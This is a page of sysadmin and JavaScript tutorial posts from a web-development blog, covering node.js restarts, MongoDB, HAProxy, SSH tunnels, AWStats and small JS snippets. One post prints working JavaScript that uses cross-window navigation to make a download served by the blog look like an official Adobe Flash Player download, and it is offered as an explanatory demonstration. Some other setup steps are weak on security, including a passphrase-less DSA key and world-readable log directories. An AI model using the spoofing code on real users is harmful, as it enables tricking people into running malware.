Simple node.js monitor and restart bash script

If you don’t want to use external tools to ensure your node server is still up and running, you may just use a super simple bash script to make sure the server gets restarted whenever it failed.
Just create a bash script in a location of your choice and give it permissions of the user you are starting your node server with. I will use the home folder of my user for node.js, which is called ‘unode’:

mkdir /home/unode/bashscripts/
nano node_restart.sh

Insert the following lines, replace the path to your node main app file and log files:

#!/bin/sh

NODE_MAIN="node /var/www/node/app.js“

if [ -z `pgrep -f -x "$NODE_MAIN"` ] 
then
    echo "Restarting $NODE_MAIN."
    cmdNODE="$NODE_MAIN 1> /var/log/node/node.log 2> /var/log/node/error.log &"
    eval $cmdNODE
fi

Save the file and set permissions to allow the bash script to be executed by cron:

chmod 755 /home/unode/bashscripts/node_restart.sh

Finally add a one minute cron to your crontab file and you are set:

*/1 *   * * *   unode   /home/unode/bashscripts/node_restart.sh

Now your node.js app will be monitored once a minute and restarted if it stopped. Of course you can modify the script very easily to monitor and restart all kinds of other processes as well.

Please vote: How useful was this post for you?
Current rating:
(5 out of 5)
Posted in Linux, Node.js | Tagged , , | Leave a comment

How to install MongoDB on Debian including PHP driver and Munin-Plugin

The following article shows the setup of MongoDB on Debian with PHP support and additional monitoring of MongoDB’s operations, connections and memory usage with Munin. We start by importing the MongoDB public key, adding the MongoDB repository and reloading our repositories:

apt-key adv --keyserver keyserver.ubuntu.com --recv 7F0CEB10
echo 'deb http://downloads-distro.mongodb.org/repo/debian-sysvinit dist 10gen' | sudo tee /etc/apt/sources.list.d/mongodb.list
apt-get update

Now it’s possible to install the MongoDB package:

apt-get install mongodb-10gen

To prevent MongoDB from upgrading the package automatically we may pin it to the version we just installed:

echo "mongodb-10gen hold" | sudo dpkg --set-selections

Thats it already. MongoDB should be already up and running, otherwise just start it manually:

/etc/init.d/mongodb start

If you have any trouble with the installation you might find the official tutorial helpful.
Now let’s get to the PHP part. In order to be able to install the MongoDB PHP driver via PECL we first need to install two packages, php-pear and php5-dev:

apt-get install php-pear
apt-get install php5-dev

After that, installation of the PHP driver is easy:

pecl install mongo

Next we need to add the driver to our php.ini to enable it. If you also intend to use the driver via command Line and/or CGI you might need to add it to multiple php.ini files. These paths are most likely the following, but your path(s) may vary:

nano /etc/php5/apache2/php.ini
nano /etc/php5/cli/php.ini
nano /etc/php5/cgi/php.ini

Add the following line:

extension=mongo.so

In order to enable the driver for Apache a server restart is necessary:

/etc/init.d/apache2 restart

Done. Now we are able to use the MongoDB PHP driver. For instructions on how to use it please see the API documentation.
Finally we may also add the Munin-Plugin for MongoDB for monitoring different aspects of the database performance. In case you have not yet installed Munin itself you can find many tutorials on the net (or just use this one). Once Munin is up and running we may continue with the MongoDB-Plugin for Munin by installing the mandatory Python package (in case it has not been already installed previously):

apt-get install python

Next lets get the plugin files from Github, extract them, copy them to Munin’s plugin folder and activate them by creating symlinks:

wget https://github.com/erh/mongo-munin/archive/master.zip
unzip mongo-munin-master.zip
cp mongo-munin-master/mongo_* /usr/share/munin/plugins/
ln -s /usr/share/munin/plugins/mongo_* /etc/munin/plugins/

Finalize integration of MongoDB stats to Munin by forcing an update and restarting munin-node:

sudo -u munin /usr/share/munin/munin-update
/etc/init.d/munin-node restart

If everything was setup correctly we can now see four new graphs in our Munin web interface (current connections, memory usage, operations and write lock percentage).

Please vote: How useful was this post for you?
Current rating:
(3 out of 5)
Posted in Databases, Linux, PHP | Tagged , , , , | Leave a comment

HAProxy Load Balancer setup including logging on Debian

If you are looking for a fast, reliable and easy to configure load balancer HAProxy might be the right choice for you. In the following post I will explain the quick and easy setup of a basic HAProxy balancer which in this example handles two domains, forwards them to three servers and also logs the incoming connections.
Ok, so we start by installing HAProxy:

apt-get install haproxy

Next we can already go ahead and edit the config file (choose your favorite editor, I will be using nano):

nano /etc/haproxy/haproxy.cfg

This file will be our main point of interest for setting up the server. We will insert four different blocks of information to the config file. These blocks are called “global”, “defaults”, “frontend” and “backend”.
We will start with the “global” block, which sets process-wide parameters. In our case it includes information for logging purposes, setting of a maximum of overall connections and open files as well as setting of user and group and daemonizing the balancer. For more detailed information on the possible configuration parameters please see the HAProxy Configuration Manual.

global
 log /dev/log local0 info
 log /dev/log local0 notice
 maxconn 10000
 ulimit-n 20000
 user haproxy
 group haproxy
 daemon

Next comes the “defaults” section, which will set default parameters for the following sections. For a detailed description of the values set here please refer to the documentation, but I think most of the values already explain itself. But have a look at the last value called “stats auth”. There you can put your credentials, e.g. user and password to enable access to statistics. Stats will be available at http://your-domain.com/haproxy?stats or http://your-server-ip/haproxy?stats.

defaults
 log global
 mode http
 option httplog
 option dontlognull
 retries 3
 option redispatch
 option forwardfor
 option forceclose
 maxconn 10000
 contimeout 5000
 clitimeout 50000
 srvtimeout 50000
 stats enable
 stats auth user:password

Next we include the “frontend” block, where we define access control lists (ACLs), which enable us to route to different backends based on the domain or other criterias such as i.e. URL path. In this example we will only use a basic differentiation by domain. After defining the ACLs we also assign them to different backends. So suppose we have our two domains “your-domain.com” and “your-domain2.com” our “frontend” looks like this:

frontend all 0.0.0.0:80
 acl acl_your_domain hdr_dom(host) -i your-domain.com
 acl acl_your_domain2 hdr_dom(host) -i your-domain2.com

 use_backend your_domain if acl_your_domain
 use_backend your_domain2 if acl_your_domain2

Ok, now we only have to set up our servers to the used backends “your_domain” and “your_domain2″. Since we expect “your_domain” to have a lot more traffic we will assign two of our three servers to that domain. We will also include a cookie for our backend “your_domain” in order to prevent the requesting user from switching servers on every request. Also, do not forget to replace the dummy IPs by your own server IPs.

backend your_domain
 cookie SRVID insert indirect nocache
 server srv_your_domain 1.2.3.4:80 cookie SRVID weight 1 check inter 20000
 server srv2_your_domain 1.2.3.5:80 cookie SRVID weight 1 check inter 20000

backend your_domain2
 server srv_your_domain2 1.2.3.6:80 weight 1 check inter 20000

Almost done. Some minor changes to the default config file are necessary.

nano /etc/default/haproxy

We need to set ENABLED to 1 in order to get all the init scripts working:

ENABLED=1

Ok, only some parts for the logging are still missing. First we need to tell rsyslog to catch our logs. For that purpose we create a HAProxy config file for rsyslog:

nano /etc/rsyslog.d/haproxy.conf

And then add the following:

if ($programname == 'haproxy' and $syslogseverity-text == 'info') then -/var/log/haproxy/haproxy-info.log
& ~
if ($programname == 'haproxy' and $syslogseverity-text == 'notice') then -/var/log/haproxy/haproxy-notice.log
& ~

Now the final step which will be configuring logrotation:

nano /etc/logrotate.d/haproxy

Insert the following to the file. This will rotate your HAProxy logs daily and keep them for 4 weeks.

/var/log/haproxy/*.log {
    daily
    missingok
    rotate 28
    compress
    delaycompress
    notifempty
    create 644 root adm
    sharedscripts
    postrotate
    /etc/init.d/haproxy reload > /dev/null
    endscript
}

Finally…done! You can now (re)start your server and let the balancing begin!

/etc/init.d/haproxy restart
Please vote: How useful was this post for you?
Current rating:
(5 out of 5)
Posted in Linux | Tagged , , , , | Leave a comment

Configuring a permanent SSH tunnel for MySQL connections on Debian

This article shows how to setup a permanent SHH tunnel between a webserver and a database server running MySQL. First of all we will create two new users, one on each server. Of course you may also use existing users, but I prefer to have users dedicated just for the tunneling job. So we will start with the database server, where we create a new user and enable him to login via Publickey Authentication by editing “sshd_config”-file:

adduser ssh-tunnel
nano /etc/ssh/sshd_config

Now add the user to “AllowUsers” and set “PubkeyAuthentication” to “yes”:

AllowUsers ssh-tunnel
PubkeyAuthentication yes

Then restart SSH:

/etc/init.d/ssh restart

Now lets switch to the webserver and create a new user as well (also install autossh if not done already):

aptitude install autossh
adduser ssh-tunnel-mysql

Now add the user to “AllowUsers” just as done before with the new user on the database server:

AllowUsers ssh-tunnel-mysql

Also restart SSH here:

/etc/init.d/ssh restart

Now login to the webserver with the newly created user “ssh-tunnel-mysql”. Next you can already try to open a tunnel. But make sure to replace SSH port, MySQL port and IP according to your configuration:

/usr/bin/autossh -M 20042 -N -L 3308:127.0.0.1:3306 -p 22 ssh-tunnel@1.2.3.4

You might get the following error:

Warning: remote port forwarding failed for listen port 20042

It means your port is in use. In this case just change “20042″ to an unused port. Once you have established the tunnel it’s time to test it. Do this in a new console window and make sure to use the correct password for the “ssh-tunnel” user:

mysql -h 127.0.0.1 -P 3308 -ussh-tunnel -pPASSWORD

Now you should be connected and able to work with the MySQL database on the database server. Try the following, it should list all your databases that exist on the database server:

SHOW DATABASES;

Since we have confirmed that the tunnel is working we can now create a public key to enable logon without a password. Make sure to execute the following commands on the webserver as the tunnel user (leave the passphrase empty when asked for it):

cd ~
mkdir .ssh
ssh-keygen -t dsa -b 1024 -f ~/.ssh/ssh-tunnel-key

Now you created a public/private key pair on the webserver. Next the public key has to be enabled inside the authorized_keys file on the database server. For this you need to login to the database server as the tunnel user and execute the following commands:

cd ~
mkdir .ssh
chmod 700 .ssh
cd .ssh/
touch authorized_keys
chmod 600 authorized_keys

Now everything is setup on the database server. So we can go back to the webserver and copy the key. Again make sure to be logged in as the tunnel user and change SSH port and IP to yours:

cat ~/.ssh/*.pub | ssh ssh-tunnel@1.2.3.4 -p 22 'umask 077; cat >>.ssh/authorized_keys'

Now test your connection again, this time by using the key:

/usr/bin/autossh -M 20042 -N -L 3308:127.0.0.1:3306 -p 22 
-i /home/ssh-tunnel-mysql/.ssh/ssh-tunnel-key ssh-tunnel@1.2.3.4

Everything working without a password now? Then you can put the tunnel in the background by using the parameter “-f”. This way your tunnel will remain active even when you close your console window:

/usr/bin/autossh -M 20042 -f -N -L 3308:127.0.0.1:3306 -p 22 
-i /home/ssh-tunnel-mysql/.ssh/ssh-tunnel-key ssh-tunnel@1.2.3.4

If you want to close the tunnel you can use the “kill”-command with the PID of the tunnel or if you are using the tunnel user just for the case of tunneling by simply executing “killall”:

killall -u ssh-tunnel-mysql

Thats it. If anything is missing, wrong or any problems occur please let me know via my contact form.

Please vote: How useful was this post for you?
Current rating:
(4 out of 5)
Posted in Linux | Tagged , , , | Leave a comment

How to install, automate and secure AWStats including GeoIP-Plugin on Debian

If you don’t want to use a 3rd-party website analytics tool like i.e. Google Analytics but still want to monitor your visitors, pageviews and so on, then AWStats might be the right tool for you. It works serverside by analyzing your logfiles and creating a simple graphical website on the most important info about your visitors. Although it is not as detailed as most frontend analytics tools it still provides a very good overview.
This is how installation works on Debian, assuming you are running Apache2 server:

apt-get install awstats

The debian installer does not automatically set the correct paths in the AWStats configuration script, so we have to do this manually (for all text editing just use your favorite editor, I will be using nano throughout this tutorial):

nano /usr/share/doc/awstats/examples/awstats_configure.pl
$AWSTATS_PATH='/usr/share/awstats';
$AWSTATS_ICON_PATH='/usr/share/awstats/icon';
$AWSTATS_CSS_PATH='/usr/share/awstats/css';
$AWSTATS_CLASSES_PATH='/usr/share/awstats/lib';
$AWSTATS_CGI_PATH='/usr/lib/cgi-bin';
$AWSTATS_MODEL_CONFIG='/usr/share/doc/awstats/examples/awstats.model.conf';
$AWSTATS_DIRDATA_PATH='/var/lib/awstats';

Now the configuration should be ok. In the next step we have to make the configuration script executable by the apache2 user, most probably www-data:

chown www-data /usr/lib/cgi-bin/awstats.pl

Now AWStats is already up and running. But we are still far from being done. Next we should check your apache2 configuration for the following lines and add them if not present (it will enable the AWStats icons for our AWStats infosite):

nano /etc/apache2/apache2.conf
Alias /awstats-icon/ /usr/share/awstats/icon/
<Directory /usr/share/awstats/icon>
    Options None
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>

Ok. Next thing to do is updating some settings in our AWStats configuration file. We need to set the correct path to our Apache access log, set our site domain and I would also suggest to change the default LogFormat and disable DNSLookup.

nano /etc/awstats/awstats.conf
LogFile="/var/log/apache2/access.log"
LogFormat=1
SiteDomain="webdevwonders.com"
DNSLookup=0

Now we can try to run AWStats for the first time (remember to fill in your domain name instead of mine):

/usr/lib/cgi-bin/awstats.pl -config=webdevwonders.com -update
/usr/lib/cgi-bin/awstats.pl -config=awstats.webdevwonders.com.conf

If you get an error message with one or the other command you might want to check your configuration settings once again. One problem that might occur is access denied to the apache log. Fix it like this and try executing the commands from above once again:

chmod 755 /var/log/apache2

If everything works we can continue by enabling browser access to our statistics:

chown www-data /usr/lib/cgi-bin/awstats.pl

Now try to open the AWStats statistics in your browser. The path should look like this (again of course your own domain name): http://webdevwonders.com/cgi-bin/awstats.pl. If you receive a 504 Gateway Timeout you will have to increase the timeout value inside apache2.conf. Something between 20 and 60 seconds should be enough.
Now next is the automation of our statistics by adding a cronjob that will automatically update them:

nano /etc/crontab

Add the following line for a 15 minute crontab or change the update cycle according to your needs (adjust domain name as usual).

/15 *   * * *   root    /usr/lib/cgi-bin/awstats.pl -config=awstats.webdevwonders.com.conf

Now let’s protect our statistics from prying eyes. We are doing this by adding a .htaccess file to our “cgi-bin”-directory:

cd /usr/lib/cgi-bin/
touch .htaccess
nano .htaccess

Now insert the following (please note that for this tutorial we will simply put the .htpasswd file in “/var/www/awstats” but you might consider putting it somewhere else).

<FilesMatch "awstats.pl">
    AuthName "Login Required"
    AuthType Basic
    AuthUserFile /var/www/awstats/.htpasswd
    require valid-user
</FilesMatch>

Now create the .htpasswd file (remember to fill in your own username):

cd /var/www/
mkdir awstats
cd awstats
htpasswd -c /var/www/awstats/.htpasswd username

Almost done, but we have to enable “AllowOverride” for the “cgi-bin”-directory to have Apache make use of our access rule. So edit the part inside your VirtualHost configuration:

nano /etc/apache2/sites-available/default
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
    AllowOverride All
    ...
</Directory>

One more thing: Restart Apache.

/etc/init.d/apache2 restart

Check your AWStats URL once again. It should be protected. AWStats configuration is fine like this and will show you lots of nice info about your visitors already, but there is one more module called GeoIP which is a “nice to have”-plugin. It will show you the country where your visitors are located at, even with a nice country flag icon!
Before we can start installing GeoIP we need to install the GNU GCC Compiler, which is included in the “build-essential”-package, as well as the library zlib:

apt-get install build-essential
wget http://zlib.net/zlib-1.2.7.tar.gz
tar xvzf zlib-1.2.7.tar.gz
cd zlib-1.2.7
./configure --prefix=/usr/local/zlib && make && make install

Now let’s go ahead and download and install the GeoIP plugin:

wget http://maxmind.com/download/geoip/api/c/GeoIP.tar.gz
tar xzvf GeoIP.tar.gz
cd GeoIP*
./configure && make && make install

Although installation should work, in some cases you might get an error like this:

checking for zlib.h... no
configure: error: Zlib header (zlib.h) not found. Tor requires zlib to build.
You may need to install a zlib development package.

This problem can be fixed by installing zlib1g-dev package. Afterwards retry the installation:

apt-get install zlib1g-dev
./configure && make && make install

Now continue with removing all previous installation files and finish installation of GeoIP:

cd ..
cd ..
rm -rfv zlib*
cpan
install Geo::IP
quit

One final step: Check in your AWStats configuration if the LoadPlugin is enabled and the path is set correctly:

nano /etc/awstats/awstats.conf
LoadPlugin="geoip GEOIP_STANDARD /usr/local/share/GeoIP/GeoIP.dat"

Now, just for the sake of making sure everything is enabled, let’s restart Apache once more:

/etc/init.d/apache2 restart

And that’s it! Hopefully you will have AWStats up and running as expected. If anything in this tutorial is missing, not working or simply wrong please let me know via my contact form so I can update the tutorial accordingly. Thanks!

Please vote: How useful was this post for you?
Current rating:
(4 out of 5)
Posted in Linux | Tagged , , , , | Leave a comment

How to animate a rectangle bottom up with Raphaël.js

Since I did not find an easy way on how to animate a rectangle bottom up with Raphael.js while searching the net I thought it might be helpful to post my simple solution of a bottom up rectangle animation with Raphaël.js. So here it is:

// Create options object that specifies the rectangle
var rect_opt = {
    width: 100,
    height: 200,
    x: 0,
    y: 0
}
 
// Container that will contain animation (suppose document contains a div with id 'raphael')
var div = document.getElementById('raphael');
 
// Create new raphael object
var ctx = new Raphael(div, rect_opt.width, rect_opt.height);
 
// Set animation speed
var speed = 10000;
 
/*
 * Create rectangle object with y-position at bottom by setting it to the specified height,
 * also give the rectangle a height of '0' to make it invisible before animation starts
 */
var rect = ctx.rect(rect_opt.x, rect_opt.height, rect_opt.width, 0);
 
// Color the rectangle nicely
rect.attr({
    fill:'#289CFE',
    stroke:'none'
});
 
/*
 * Animate the rectangle from bottom up by setting the height to the earlier specified
 * height and by setting the y-position to the top of the rectangle
 */
rect.animate({
    y:rect_opt.y,
    height:rect_opt.height
}, speed);

And here is how it looks like in action (infinite loop):

Please vote: How useful was this post for you?
Current rating:
(4 out of 5)
Posted in Animation, Javascript | Tagged , , | Leave a comment

Fix for wkhtmltopdf rendering issue when using SVG

I recently spent some hours trying to find out why my SVG graph wasn’t rendering properly with wkhtmltopdf. Since the same problem might occur to others I wanted to share it here. So this is the issue: It seems like wkhtmltopdf has a problem with rendering when you use “stroke-dasharray” inside a SVG with a value of “0″, which may be used to set a path to a continuous line. Whenever this is used, wkhtmltopdf will fail to render the SVG properly (see bug report for further info).
If this happened to you while using Raphael.js you can fix this by updating a value inside the library. Raphael.js is using a “0″ for “stroke-dasharray” whenever you either leave the value empty or use “none” as the value. Inside the library you will find this where an object “dasharray” is initialized (right above the initialization of the function “addDashes”). You can replace both zeros by a very high value, i.E. 99999. It only needs to be higher than the pixel length of your path, because then it will still be shown as a continuous line.

Please vote: How useful was this post for you?
Current rating:
(5 out of 5)
Posted in Animation, HTML/CSS | Tagged , , , | Leave a comment

Malicious file download – and nobody will notice

I recently came across a very sneaky yet impressive way of tricking people into downloading a malicious file. But before you continue reading you might want to download the newest Flash Player version?! Yeah, I know Flash is dead, but please give it a try anyway and see if you notice anything strange about it…
Done? Ok. So what you just downloaded was, of course, not a new Flash Player version but a possibly malicious file from my website. Maybe you noticed that the file was requested from webdevwonders.com instead of adobe.com.
The name of the domain is actually the only easy way to notice that you are just downloading a different file from another server than expected. Now imagine a malicious download from a domain like flashplayer-download.com. How many people would be suspicious, even if he or she read the name of the file host?
But lets have a look at the code now (by the way, this will NOT work in Internet Explorer):

// Called 'onclick' of the link
function openFlashWebsite() {
    // http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer
    window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer">', 'foo');
    setTimeout(triggerDownload, 4500);
}
// Will be called after a timeout of 4.5 secs
function triggerDownload() {
  window.open('http://webdevwonders.com/download/flashplayer', 'foo');
}

Now what is happening here? First of all the function “openFlashWebsite” is called by clicking the link. It will initiate a new window with a “text/html” data URI that will itself initiate a new window (or tab) that will immediately open the Flash Player download site via a meta refresh. But secondly, the function also starts a timeout, which will be triggered after 4.5 seconds and will open a document with a “Content-Disposition: attachment;”-Header that will trigger the download of a file called “flashplayer_11.exe”, which is served by this blog. The sneaky thing about it is, that this download will get attached directly to the opened site which will be the Adobe Flash Player download site, tricking the user into thinking that this is the expected Flash Player download. This is made possible by the concept of web browser documents having the ability to navigate other (cross-origin) windows to arbitrary URLs. A deeper explanation of the issue is given in “The Tangled Web” by Michal Zalewski, whose blog also deserves the credit for this.

Please vote: How useful was this post for you?
Current rating:
(4 out of 5)
Posted in HTML/CSS, Javascript, Security/Privacy | Tagged , , , , , | Leave a comment

Deep copy Javascript objects

Knowing the difference between a value being assinged by reference in contrast to being assigned by value is crucial. In Javascript primitive types like strings or numbers are always assigned by value. So assigning a variable A to a variable B results in variable B containing a “real” copy of variable A. Changing the value of variable B afterwards won’t change the value of variable A.
However, when assigning an object A to an object B in Javascript, object_b is assigned by reference, meaning that both variables point to the same object. In this case changing a property in object B will change the property in object A as well. See the following example:

var object_a = {url:"webdevwonders.com"};
var object_b = object_a;
object_b.url = "google.com";
alert(object_a.url); // Alerts "google.com"

Object A’s property “url” has changed to “google.com”, because the variable object_a points to the same object as variable object_b does. That’s nice but in quite a lot of cases a real (or deep) copy is what you want. The solution to the problem is to loop over each property of object A and assign its value to the property of object B. That is what the following code accomplishes:

var object_a = {url:"webdevwonders.com"};
var object_b = {};
for (var prop in object_a) {
    object_b[prop] = object_a[prop];
}
object_b.url = "google.com";
alert(object_a.url); // Alerts "webdevwonders.com"

If you’re using jQuery there’s a far more elegant way to solve the problem:

var object_a = {url:"webdevwonders.com"};
var object_b = jQuery.extend(true, {}, object_a);
object_b.url = "google.com";
alert(object_a.url); // Alerts "webdevwonders.com"
Please vote: How useful was this post for you?
Current rating:
(4 out of 5)
Posted in Javascript | Tagged , | Leave a comment

Detect Firefox add-on Adblock Plus

Some time ago I wrote a post explaining how to detect firefox add-ons. However, the described way only works for a couple of add-ons. And it doesn’t work for the most popular add-on of all called Adblock Plus. But instead there is an even simpler way to detect if a visitor coming to your website has activated Adblock Plus.
Since Adblock Plus blocks URLs and hides containers using a naming pattern (i.e. hiding all elements on a website containing the class “ad-column”) it is possible to trigger the add-on to hide an element on the page and then check with a simple JS-Script if it is still visible or hidden, the latter meaning that the visitor has Adblock Plus currently up and running.

Checking your Adblock Plus status…

The following script detects Adblock Plus by checking if the container with the id “adright” is hidden (using jQuery):

<div id="adright"></div>
<script type="text/javascript">
if ($("#adright").is(":hidden")) {
    alert("Adblock Plus activated!");
} else {
    alert("Adblock Plus NOT activated!");
}
</script>


The script above works for the standard English filter subscription of Adblock Plus but might not be working for other country-specific subscriptions. For a complete overview of URLs and containers blocked by your filter subscriptions have a look at the filter rules in the Adblock Plus preferences and adjust the script accordingly.

Please vote: How useful was this post for you?
Current rating:
(4 out of 5)
Posted in HTML/CSS, Javascript, Security/Privacy | Tagged , , | Leave a comment